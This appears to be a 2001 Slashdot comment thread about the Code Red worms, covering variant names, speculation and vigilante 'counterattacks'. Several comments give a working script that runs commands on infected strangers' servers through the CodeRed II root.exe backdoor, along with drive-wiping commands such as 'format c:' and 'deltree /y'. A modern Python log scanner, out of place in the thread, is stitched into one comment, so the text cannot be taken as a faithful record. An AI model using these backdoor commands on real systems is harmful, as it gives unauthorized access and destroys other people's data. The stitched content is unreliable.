    My guess for Code Red IV: Communications and indexing for directory data collected by Code Red III, with remote file retrieval operation supported by the installed Code Red III server.

    All Code Red versions seem to be confining themselves, for the most part, to high-speed broadband links. Hrm.. What lives on broadband? Internet-Enabled Banking. Boeing. Intel. Research campuses (educational and otherwise). Investment houses. Working E-Commerce corporations. Etc. All are primary industrial espionage targets. Some are prime military-industrial espionage targets (I sat through lots of "spot the spy" classes when I worked at an aerospace firm). All have massive amounts of Intellectual Property data.

    So, we have a virus that sends out random files into the internet while self-propagating. A program that can take over a webserver and attack other sites. An evolved version with a back door. An evolved version with what appears to be a server. And a logical evolution of the program that does something with all the others..

    While the rest of the world is in a panic, I am fully expecting that we will see a massive amount of data flowing towards a central server as the Code Red XX development TEAM engages in the world's first Automated Industrial Espionage operation.

    Now, the only question that remains to be determined is who hired the development team, and why. I have my own suspects.

    The Rosetta Stone

    ~

    Don't worry about those who call themselves insane. Worry about the ones who say they're 'normal'.

  83. Asian Porn Worm :-) by Anonymous Coward · · Score: 0

    I want a worm that does this to my website :)))

    1. Re:Asian Porn Worm :-) by Epynonymous+Cowherd · · Score: 0

      You want a worm that polls as to whether your website should be made into an Islamic state? * shrugs *

      --
      The real Eponymous Cowherd has uid 15974. Anyone else is an imposter.
  84. Re:Shutting off IIS on an comprimised box... by frankie · · Score: 2

    Most of the infections I've seen are on home PCs with cable modem, and the owner doesn't even know that IIS is active by default. I'd like to find a request that will switch IIS service from automatic to disabled. They'll never notice the difference, and the world will be a better place.

  85. Re:make some money off banner ads by ekrout · · Score: 1

    I see someone has a I-Hate-The-World's-Living-Things-Because-I'm-Barely-Smart-Enough-To-Point-And-Click-My-Way-To-MSCE-Certification complex. Interesting.

    --

    If you celebrate Xmas, befriend me (538
  86. Re:More information? by Hulboy · · Score: 1

    I know in Win98 you could (can?) do this with the undocumented /autotest switch...

  87. Re:Finally by TheMidget · · Score: 1

    Shouldn't we first see Micro$oft Strikes Back, and the The Return of the Code Red? And then, the prequels: The Phantom Incompatibility (You remember, the AARD code that faked an incompatibility with DR DOS), and then Attack of the Browsers (yeah, I know. That title sucks. Browser Wars would sound much better...). In the meantime, the original episode Code Red will be renamed A New Worm...

  88. Re:Version 3? Don't think so. by kryptkpr · · Score: 1
    Good, I'm not the only one...I looked, and saw nothing on BUGTraq about this crazy "v3", nothing.

    You'd think slashdot would at least TRY to verify the stories?

    --
    DJ kRYPT's Free MP3s!
  89. Re:Stop addressing Code Red by purplemonkeydan · · Score: 1

    Then you should manually remove the .ida mapping to the index server dll.

  90. Re:make some money off banner ads by hawkbug · · Score: 1

    If you make default.ida a php based file, why wouldn't a redirect server side work?

  91. Re:Mozilla is the cure by Anonymous Coward · · Score: 0
    Awesome plan! Mozilla can't stay running long enough to pop anything up or under (or display content).

    Are you a security expert?

  92. Dynamic Updates by Tom7 · · Score: 2


    Hehe.

    I'm waiting for one which sends digitally-signed updates to hosts (like hybris did off usenet) for upgrade capabilities. From what I understand, CR2 was not directly based on CR1's code (though it's easy enough to disassemble the executable that it sends your web server...)

  93. Re:Put it in another log and forget about it. by Malc · · Score: 1

    Hmmmm... maybe I should set up a redirect for all requests containing "cmd.exe" or "root.exe", and send them to www.fbi.com?? ;)

    Ultimately, I don't know if these redirects even work... the requests probably don't come from a browser that automatically handles the redirect for the user.

  94. I want Code Red IV myself... by QwkHyenA · · Score: 4, Funny
    Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

    --
    LFS. Have you built your system today?
    1. Re:I want Code Red IV myself... by b1t+r0t · · Score: 2

      I'd be happy if it used an HCF instruction, or at least programmed the video chip for an extremely high resolution at 100 Hz refresh, resulting in the monitor going HCF. Another option (on soft-power ATX machines) is to shut down (but not reboot) the system. Maybe zero out the boot blocks, too. Actually just the boot blocks alone would be enough fun. Basically, something annoying that has at least a 1% chance of getting the attention of your average MCSE.

      --

      --
      "Open source is good." - Steve Jobs
      "Open source is evil." - Microsoft
    2. Re:I want Code Red IV myself... by mergy · · Score: 1

      I hear Microsoft will try and release Code Red IV one month prior to their planned date due to antivirus software companies trying to quash their innovation. Stay tuned!

    3. Re:I want Code Red IV myself... by Anonymous Coward · · Score: 0

      Code Red IV == Windows XP

    4. Re:I want Code Red IV myself... by JBowz15 · · Score: 2

      I can't wait for Code Red IV...

      I really liked the first three, and I hear that in part IV, Code Red fights the big Soviet after Apollo gets killed by him.

      Too bad Code Red part V will inevitably suck.

    5. Re:I want Code Red IV myself... by siokaos · · Score: 1

      Why? It's a lot more fun just playing with the near-dead carcass than throwing it in the river!

      --
      http://siokaos.org/
  95. More information? by Dr.+Evil · · Score: 5, Interesting

    I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

    The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In other words, they're only figuring out now how bad Code Red II is.

    1. Re:More information? by ncc74656 · · Score: 5, Informative
      Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

      Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

      That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

      I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

      Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

      #!/bin/sh
      # Pull the distinct source hosts that requested /default.ida (requestid 2058
      # in this apachedb schema) since 31 July 2001 out of the MySQL access log.
      http_proxy=
      for i in $( (echo 'use apache2;' ; echo 'select host.host from transfer inner join host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-07-31";') | mysql | sort | uniq | grep -v '^host$' )
      do
        echo -n "Sending Code Red message to $i..."
        # One ping with a three-second deadline; skip hosts that are unreachable.
        result=$(ping -c 1 -w 3 "$i" | grep "100% packet loss")
        if [ -n "$result" ]
        then
          echo "host is down."
        else
          # Ask the CodeRed II backdoor (root.exe in the scripts/ mapping) to run
          # "net send localhost" with the warning; the Lynx output is discarded.
          lynx -dump "http://$i/scripts/root.exe?/c+net+send+localhost+%22Your+web+server+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location).%22" >/dev/null
          echo "message sent."
        fi
      done

      Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

      --
      20 January 2017: the End of an Error.
    2. Re:More information? by Anonymous Coward · · Score: 0

      That should be 'net send %USERDOMAIN% "insert message here"'

    3. Re:More information? by macdaddy · · Score: 2

      It's not offtopic if I'm answering someone's question. Damn trolls with moderator points to burn.

    4. Re:More information? by tijnbraun · · Score: 1

      you can't actually kill iis on a nt server.. even if you're logged in as administrator... it will barf something like "blabla not allowed". A command line kill does exist, but you'll have to download something from MS (google said it's Windows NT Resource Kit)... the other way is, believe it or not:
      net stop "World Wide Web Publishing Service"... this won't work however if IIS is trapped in an endless loop of some sort ...

    5. Re:More information? by Anonymous Coward · · Score: 0

      Actually, IIS itself runs at a very privileged level, LocalSystem (which is how the worm can infect a machine).

      Normal requests, such as to root.exe, get impersonated in the context of another account, generally the anonymous user, IUSR_machinename.

    6. Re:More information? by penguinboy · · Score: 1

      Unfortunately, IIS typically runs as a relatively unprivileged service that doesn't have rights to format the hard drive. Some of the IIS installs out there are bound to be running with system-level access, though..

    7. Re:More information? by archmedes5 · · Score: 1

      Unless you know how to start disk administrator from a command prompt to format the drive, you might have problems. Especially since the format command doesn't work the same way in NT. I just created a quick webpage and go through the last few logs and force iexplore.exe to open and point it at the page, they'll get the idea.

    8. Re:More information? by MouseR · · Score: 2

      From the report on Headline news it is faster and creates a "bigger backdoor" than Code Red II

      What the hell is a bigger backdoor?

      One's socket after being rampaged with a big stick?

      Gee, do I find reporters entertaining when they talk about things they don't know (which is about everything except reporting).

    9. Re:More information? by snake_dad · · Score: 2
      Don't forget the "echo Y" pipe trick :-)
      I don't know if that still works under NT though, fortunately no NT machine available to test it...

      --
      karma capped .sig seeking available Slashdot poster for long-term relationship.
    10. Re:More information? by The+Troll+Catcher · · Score: 1

      I can think of an easy way to still spread but nuke the machine:

      Just set up a timer - have it run scans for a few hours, and then wipe the disk. Sounds pretty trivial, actually.

    11. Re:More information? by sqlrob · · Score: 1

      WTF is a "bigger backdoor" than full access to the system from any web browser?

    12. Re:More information? by Anonymous Coward · · Score: 0

      Korea isn't in SE Asia, fool. Buy a map.

    13. Re:More information? by Anonymous Coward · · Score: 0
      Sorry if this is a lot to ask...

      I have been using WebSnarf.pl to catch and log CodeRed requests. I would like to add the 'net send' as a response to WebSnarf.pl (from unixwiz.net). Also, I think sending to %USERDOMAIN% would make a big impact... Can anyone translate this to Perl?

    14. Re:More information? by Anonymous Coward · · Score: 0

      Full Telnet access.

    15. Re:More information? by reverius · · Score: 0

      Actually, this is exactly what I thought when I read the article... a half hour before this was posted.

      I thought "Code Red III" looked funny, but didn't think to submit it to Slashdot, what with it being a pile of crap and all... :)

      I still think there are only two versions, and they're claiming the second one is the third.

    16. Re:More information? by helleman · · Score: 3, Informative

      Modified version to grep the standard Apache log. Change the top to be the following:

      #!/bin/sh
      for i in `(grep default /var/log/httpd/access_log | cut -f1 -d- | sort | uniq )`
      do

    17. Re:More information? by blakestah · · Score: 5, Funny

      In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.


      What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
      Still has the XXX and installs the backdoor

      Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

      We can do it for them...

      GET /script/root.exe?+%2fc+format+c:

    18. Re:More information? by Drone-X · · Score: 2
      Don't forget the "echo Y" pipe trick :-)

      I very much doubt piping or redirecting is going to work, the system (or its equivalent) call probably won't accept that.

      What you could do is issue a "deltree /y c:\*.*". However, I had no luck with doing a "dir c:\*.*" previously so perhaps only a "deltree /y ..\..\*.*" works via root.exe.

    19. Re:More information? by pi_rules · · Score: 4, Informative

      There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.

      CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.

      In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.

      Justin Buist

    20. Re:More information? by ncc74656 · · Score: 2
      maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red
      I threw IIS onto my Win2K box (it sits behind a Linux firewall and only does workstation stuff) to play with different usernames. I considered sending to Administrator, but if nobody is logged in as an admin, nobody will see the message. Also, some shops change "Administrator" to something else, in which case sending to that name will fail altogether. (I'll allow that someone with the minimal clue needed to rename the admin account probably knows well enough to keep up on patches and updates, so this might not be a common occurrence.) Your suggestion to send to /domain only works if domain-based security is in use (presumably either the domain security in NT 4 or ActiveDirectory in Win2K). Most of the shops that are having problems with CodeRed probably don't know how to set up and manage domains.

      Sending the popup to localhost, OTOH, makes reasonably sure the message gets to the server. It could be a problem if the server is stuck in a corner somewhere and nobody ever fires it up to check on it periodically.

      I let the script loose this afternoon. For some reason, it only got to 229 hosts before conking out. (My CodeRed log page lists "3689 attempts logged from 1419 hosts" as of this writing. 2142 of those are from other lvcm.com customers.) Of those, it said 172 were down. Of the 57 that were up, 22 appear to have been fixed (Lynx came back with an error, probably because root.exe is gone from the CGI directory). 35 were still infected. 35 of 57...that's three out of five machines still opened wider than the goatse.cx guy, even after a week and a half.

      --
      20 January 2017: the End of an Error.
    21. Re:More information? by Anonymous Coward · · Score: 0

      CRv1, original (also Code Red, or Code Red I)
      CRv2, the one you call CRv1b
      Code Red II
      Code Red III
      Four versions now.

    22. Re:More information? by Anonymous Coward · · Score: 0

      Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?
      hmmm, that reminds me. I have to go visit The Red Pacman Menace site.

    23. Re:More information? by ncc74656 · · Score: 1
      I should probably mention that if (like me) you're logging Apache traffic to MySQL with apachedb, you'll probably need to change the query to whatever requestid corresponds to /default.ida on your system. Going into MySQL and doing something like this:

      use apache2
      select id from request where request="/default.ida";

      ought to work to get that info. Then again, if you're using apachedb, you've probably figured it out already, and I'm stupid for not having put this in the original post in any case. :-)

      --
      20 January 2017: the End of an Error.
    24. Re:More information? by Phroggy · · Score: 2, Insightful

      Code Red II doesn't give you Administrator access; root.exe usually runs with the privileges of the Internet Guest Account.

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    25. Re:More information? by ichimunki · · Score: 1

      well, in that case, can it be made to do Start->Shut Down... remotely?

      --
      I do not have a signature
    26. Re:More information? by wagnerer · · Score: 1

      Doesn't the worm disable file privileges after the restart?

    27. Re:More information? by unitron · · Score: 2

      For which command is /autotest an undocumented switch?

      --

      I see even classic Slashdot is now pretty much unusable on dial up anymore.

    28. Re:More information? by Shimmer · · Score: 1

      What "echo Y" trick? I think I know what you're trying to do, but I'd like to know how to do it. (For theoretical purposes, of course.)

      -- Brian

      --
      The most rabid believers in American Exceptionalism are the exact same people whose policies are destroying it.
    29. Re:More information? by ichimunki · · Score: 2

      If we have full access via web browser to the system, can't we simply send a GET with a URL ending in a goddam "poweroff" command or at least "kill -9 IIS" or "rm -rf /IIS/"? (Note that I include only Unix commands because I have no idea what these commands would be on NT)

      --
      I do not have a signature
    30. Re:More information? by ryanr · · Score: 4, Funny

      The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

      Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

      For people who are asking in other threads here, CRv1 and CRv2 use NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

      Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

      In any case, if someone is able to translate
      this link
      That would be a huge help.
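
The N-versus-X distinction ryanr (and pi_rules, further up) describe, plus the per-source hit counts several posters are tallying from their Apache logs, as an added example that is not any poster's code or eEye's: a small Python scanner that parses common-format access log lines, flags a /default.ida request as a Code Red probe only when the filler run is long, labels it CRv1/CRv2 (N filler) or CodeRed II (X filler), and counts hits per source host. The minimum filler run of 64, the 224-byte filler length in the sample lines, and the 10.0.0.x addresses are my assumptions; the %u payload suffix is copied from the log line thing12 posted, and the rest of the sample log is constructed.

```python
"""Classify Code Red probes in an Apache access log by worm variant."""
import re
from collections import Counter, defaultdict

# Apache common/combined log prefix: host ident authuser [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# The probe is GET /default.ida? followed by a long run of one filler byte and then
# the %u-encoded payload. Per the thread, CRv1/CRv2 fill with N and CodeRed II with X.
# The minimum run of 64 is an assumed threshold so a stray short request is not counted.
PROBE_RE = re.compile(r'^/default\.ida\?(?P<fill>N{64,}|X{64,})%u')


def classify_request(path):
    """Return 'CRv1/CRv2', 'CodeRed II' or None for one request path."""
    m = PROBE_RE.match(path)
    if m is None:
        return None
    return 'CRv1/CRv2' if m.group('fill')[0] == 'N' else 'CodeRed II'


def parse_line(line):
    """Split one log line into fields; None if it is not a well-formed entry."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def summarize(lines):
    """Map variant -> Counter of hits per source host over an iterable of log lines."""
    hits = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec['method'] != 'GET':
            continue
        variant = classify_request(rec['path'])
        if variant is not None:
            hits[variant][rec['host']] += 1
    return hits


def infected_hosts(lines):
    """Sorted distinct CodeRed II sources, i.e. the hosts that would carry root.exe."""
    return sorted(summarize(lines)['CodeRed II'])


# Constructed sample log (assumed addresses; payload suffix from the line quoted in the thread).
PAYLOAD = ('%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801'
           '%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a')
SAMPLE_LOG = [
    '209.98.92.1 - - [10/Aug/2001:21:20:35 -0500] "GET /default.ida?' + 'X' * 224 + PAYLOAD + ' HTTP/1.0" 404 298',
    '209.98.92.1 - - [10/Aug/2001:21:41:02 -0500] "GET /default.ida?' + 'X' * 224 + PAYLOAD + ' HTTP/1.0" 404 298',
    '10.0.0.7 - - [19/Jul/2001:14:03:11 -0500] "GET /default.ida?' + 'N' * 224 + PAYLOAD + ' HTTP/1.0" 404 298',
    '10.0.0.9 - - [10/Aug/2001:22:00:00 -0500] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [10/Aug/2001:22:00:01 -0500] "GET /default.ida?XXXX HTTP/1.0" 404 298',
    'this line is not a valid log entry',
]

if __name__ == '__main__':
    for variant, counter in summarize(SAMPLE_LOG).items():
        for host, n in counter.most_common():
            print(f'{variant:10} {host:16} {n}')
```

Feed it a real log with `summarize(open('/var/log/httpd/access_log'))`; only the CodeRed II sources matter if you want the list of hosts that actually have the backdoor, which is what `infected_hosts` returns. A plain `grep default` over the log (as in the modified script above) also picks up CRv1 sources that were never backdoored, and requests that merely mention default.ida.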

    31. Re:More information? by asackett · · Score: 2, Insightful
      However, I had no luck with doing a "dir c:\*.*" previously so...

      You may get 403'd several times, as the infected machines reach their limits after a while. Just keep poking at it, you'll get your directory listing. What you won't get, though, is privilege enough to shut down either IIS or the OS itself, format the drives, reboot the box, etc.

      Some folks have taken to leaving graffiti in infected machines as they find them. It's awfully tempting...

      --

      Warning: This signature may offend some viewers.

    32. Re:More information? by Anonymous Coward · · Score: 0

      Check out:
      http://www.incidents.org/diary/diary.php

      According to Mr. Dittrich's analysis, Power infects Microsoft Windows 2000 and Windows NT systems running IIS servers that are vulnerable to the Unicode bug. The Power software is actively being developed, and the bot armies (which are controlled via an IRC channel) are most often used to wage distributed DoS attacks in IRC "wars". (See the following for more information about the Unicode vulnerability.)

      Indeed, something is up!

    33. Re:More information? by snake_dad · · Score: 2
      Purely hypothetical, this might work:

      "echo y|format c:"

      Theoretically this would bypass the "are you really, really, absolutely 100% sure that you want to format this drive which may cause some data loss?" question... Of course, theoretically, this only works in "english" versions of format.[com|exe|whatever].

      I, hypothetically, could have used this to scare the living shit out of some friends, by typing it on the command prompt and then hovering over the enter key, grinning mischievously. I never did, of course.

      Maybe the format command needs a "/u" parameter, but researching this is left as an educational exercise for the reader :-)

      PS: one word: .... backup! :)

      --
      karma capped .sig seeking available Slashdot poster for long-term relationship.
    34. Re:More information? by Cheeko · · Score: 2, Informative

      Actually I believe that Code Red III is the variant that CNN reported is showing up in Southeast Asia (Korea I believe). From the report on Headline News it is faster and creates a "bigger backdoor" than Code Red II. Then again, until it starts to hit someplace in the US or Europe I don't think it will be really confirmed.

    35. Re:More information? by cabbey · · Score: 2

      maybe you should send it to more than just localhost... you'd have to check on a windows box, but I think "net send /domain the server at $ip is infected by code red, see www.cert.org/advisories/CA-2001-23.html for details" would be more effective, especially if the server admin's boss sees it.

      and while you're at it, stop the infection from spreading: 'net stop "Internet Information Server"' ;)

    36. Re:More information? by macdaddy · · Score: 1, Offtopic

      Keys to the server farm, admin's car, and his or her house.

    37. Re:More information? by BigBlockMopar · · Score: 2

      I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

      Very, very, very cool. Thank you for sharing it. I'm going to hack it to tail a standard Apache log file and alert the luser directly.

      --
      Fire and Meat. Yummy.
    38. Re:More information? by BigBlockMopar · · Score: 4, Funny

      We can do it for them...
      GET /script/root.exe?+%2fc+format+c:

      Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

      Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

      --
      Fire and Meat. Yummy.
    39. Re:More information? by cabbey · · Score: 2

      oh yeah... I forgot about the requirements on having domain auth setup... it's already been there on every windows box I've ever used.

      Your numbers look a little better than mine, odd given that mine were all connected back within a few seconds of connecting to me.

    40. Re:More information? by Hulboy · · Score: 1

      format c: /autotest will format a drive from a batch file with no prompts, IIRC.

  96. Re:Obviously,IIS is *vastly* more popular then apa by anshil · · Score: 1

    Apache also runs per default on many linux distros, I also didn't know it until I entered once 'localhost' into my browser and was surprised that I got an answer...

    However I believe that many linux users after some time were curious and typed 'ps ax' and looked at what each program is good for.

    --
    Karma 50, and all I got was this lousy T-Shirt.
  97. Marketing by csbruce · · Score: 2

    Code Red III which is apparently faster and more vicious than its entertaining predecessors.

    I've always suspected that Code Red was secretly made by Microsoft's Marketing department to convince users to upgrade to the very latest products (and to grab XP as soon as it becomes available). That it's taken three versions to make Code Red work well is the proof!

  98. Re:Microsoft should be sued by tcc · · Score: 2

    Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet?

    THERE WAS a patch AVAILABLE *BEFORE* that virus got mainstream.

    Why should microsoft get sued for having stupid users?

    It's not like Linux didn't have any opened holes ever. You have to patch your linux? people have to patch their windows. Period. This virus is spreading like flu, not BECAUSE of microsoft, but because of INCOMPETENCE and cluelessness...

    I mean, one simple patch, poof! no more problems. Why the heck do I still see my cable modem light flash like hell even after a WEEK that everyone knows about this thing?

    See? that's a *&#@*(@& good argument for microsoft to tell the people "don't install non-certified drivers" "don't install non-ms-approved software" "don't do this and that"... people need to be wiped and taken by the hand to be shown what to do. This virus is the greatest proof that the world is full of clueless people and that's why some people won't care if their OS babysits them.

    BTW, I don't like the idea of microsoft controlling everything (nor any other companies), I just say this will give them bullets to automate the patching/drivers things without your knowledge (and of course adding a couple of "justified" intrusive programs as well). Tech people always have to pay because of non-tech people, it has always been like that... just like we have to pay high insurance rates because people have abused it and gave ammo to the insurance companies to f* us.

    I'm so fucking tired of this virus.... where's the big reset switch of the internet? :)

    --
    --- Metamoderating abusive downgraders since my 300th post.
  99. Re:Perhaps we should reconsider... by Rob+Mac+K · · Score: 1
    However, as others have pointed out in other articles, "unauthorized access" is illegal, no matter what. Plus, if you shut someone down and they lose $50,000 in data (and find out you were the one who did it), they're going to have you arrested and sue you, probably for $50 million. Ask Kevin Mitnick about inflation from "damages" for "unauthorized access".

    Yeah, I thought about that too. Of course, while one could argue that anyone propagating CR is asking to get shut down, that won't help you when The Man knocks on your door in the middle of the night.

    If one was going to be smart (we're all smart, right? ;), one could query the offending web server IP, and if it's got the default IIS home page (easy to recognize), shut down IIS. It's obviously not being used.

    It's tricky, though. Obviously, those (l)users can't be counted on to do even minimal administration on their servers (which many apparently don't even know they are running - nice going, Bill!) (Though to be fair, some Linux distributions - cough, RedHat, cough - turn on all sorts of random services by default that the user probably doesn't want/need.) The ISPs have been ridiculously slow to respond to the problem (though I read that finally RoadRunner is shutting off people who are infected - which *I* appreciate, since my cable modem light has been going bananas for days). I don't see another solution besides having the technical community take a proactive stance.

    The kicker about all this is, now there are literally *thousands* of rooted boxen out there just waiting to be used in the biggest DDOS attack the world has ever seen. What we've seen so far is just the prologue to the real problem.

  100. Network Engineers can help by Anonymous Coward · · Score: 0

    For those of you network engineers who have not yet seen this.... The following link provides information on how to use some features of your cisco routers to stop code red from getting to your IIS servers. http://iponeverything.net/CodeRed.html

  101. Re:Better Names by Liquid(TJ) · · Score: 1

    "Code Blue" is also what hospitals say over the intercom when someone dies and they need a trauma team / defibrillator. "Adult code blue, room 412. Adult code blue, room 412."

  102. Re:It's not like they haven't announced the patch by TheMidget · · Score: 1
    > And if you know how to do that, you're not a 'stoopid mcse'.

    True, a "stoopid mcse" could never design anything like that. But the problem is, he thinks he can... and will always find a gullible boss to believe him...

  103. Re:Code Red is trying to eat me! by Anonymous Coward · · Score: 0

    I had this problem. The modem would work for an indefinite amount of time then lock up requiring a power reset to work correctly again. Disabling the web access fixes the problem.

  104. Re:Microsoft should be sued by mpe · · Score: 2

    Suppose you're a regular home user. You go to the store and buy a PC with windows preinstalled. Since you get the OEM version of Windows you don't get a nice windows box, you don't even get a decent manual, all you get is a license and, if you're lucky, a CD.

    Doesn't really matter how you buy Windows, you aren't going to get even a half decent manual....

  105. Not bad, but... by DahGhostfacedFiddlah · · Score: 1, Funny

    i'm still waiting for the release of Ultra Turbo Code Red XI, Player's Edition...

  106. Re:make some money off banner ads by Anonymous Coward · · Score: 0

    Hell just take the script that makes a pop up on the screen of the infected user computer, and instead of a pop up window, just have it start IE with the URL needed from your site to then redirect it to the banner ads.

    Hell, it is just too simple.

  107. Perhaps we should reconsider... by Rob+Mac+K · · Score: 3, Interesting
    I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response, but I wonder if the right thing to do to protect against the worm (actually, against all the morons still running these unpatched servers) would be to log an "attacking" IP, then "counterattack" by executing a command on those servers to shut them down, so they'd quit trying to infect everything in sight? I mean, geez, I know it's probably ethically (and legally) wrong to exploit the back doors, even if it's just to shut down the servers, but wouldn't that be better than sitting around doing nothing? (Since the various ISPs don't seem to be doing anything other than sending out e-mail - at this point, ignorance can't be an excuse for anyone still running an unpatched server).

    Thoughts?

    1. Re:Perhaps we should reconsider... by tringstad · · Score: 2

      I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response

      I would have agreed with you, and there was a debate about it in one of the earlier articles, but it seems that @home has no problems with that type of behavior. I found this interesting gem in my server logs last night:

      2001-08-09 04:08:11 24.0.0.203 - me.me.me.me 80 GET /c/winnt/system32/cmd.exe /c+VER 404 -

      At first I thought it was just another leet script kiddie, tap, tapping at my ports, but the originating address struck me as interesting, so I did a quick nslookup:

      Name: authorized-scan1.security.home.net
      Address: 24.0.0.203

      Authorized Scan?!? By whom?!? I don't recall the TOS mentioning anything about my ISP being authorized should they want to try rooting me...

      I calmed down, thinking maybe it was just a one time scan, to see who was infected, but it has since popped up a few more times. And what's more, they certainly don't seem to have been very effective in doing anything, as I'm still being flooded as much as before.

      (And yes, I realize this is not the exact same thing described by the parent, but it was similar, and reminded me about it, getting me fired up again.)

      -Tommy

      --
      "I got a half gallon of Jack, and 2 dozen Ant Traps. I'm about to get wild." -me
    2. Re:Perhaps we should reconsider... by norton_I · · Score: 3, Interesting

      I have been seriously considering the "counterattack" method for a while now (as opposed to a self replicating anti-virus, which I am firmly opposed to).

      I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.

      Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."

      This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.

    3. Re:Perhaps we should reconsider... by alpinist · · Score: 1
      Though I'm only getting ~20 CR hits per hour and my local network appears unaffected, I did think about exactly that.

      However, as others have pointed out in other articles, "unauthorized access" is illegal, no matter what. Plus, if you shut someone down and they lose $50,000 in data (and find out you were the one who did it), they're going to have you arrested and sue you, probably for $50 million. Ask Kevin Mitnick about inflation from "damages" for "unauthorized access".

      Unless this anti-worm self-propagates, then anyone with a system running this worm must have installed it themselves, and would have a hard time arguing that they didn't know what it was doing. If the anti-worm self propagates, then it's another worm that though it has benign intent, may have serious flaws that won't be picked up until it's too late. Internet worm of 1988 a case in point.

    4. Re:Perhaps we should reconsider... by norton_I · · Score: 2

      Yeah, but the webserver would be off. There is no vulnerability until it is turned back on. The goal is, if someone actually uses their webserver, they will notice it is off, and when they turn it on, the first thing they will see is "you need to install this patch". If they don't use it, they will never notice it is off, and they will be immune to all further IIS worms.

    5. Re:Perhaps we should reconsider... by Rob+Mac+K · · Score: 1

      That's basically what I would do, with the caveat that I'd make sure they were running the default IIS home page before I turned off IIS. It's far from a perfect solution, but it's better than nothing...

  108. How would you cover the worm tracks? by Anonymous Coward · · Score: 0
    Usually a worm or virus can be traced to its originator by diligently going through logs and such until you can isolate the first occurrence. If such a process were in place for tracking, how would you sneak a worm like CodeRed Vx.x onto the internet without leaving a track? Here is one possibility, assuming that the perpetrator is at least a competent cracker.

    1) First, stealthily locate a vulnerable IIS server. Simple, pick one.

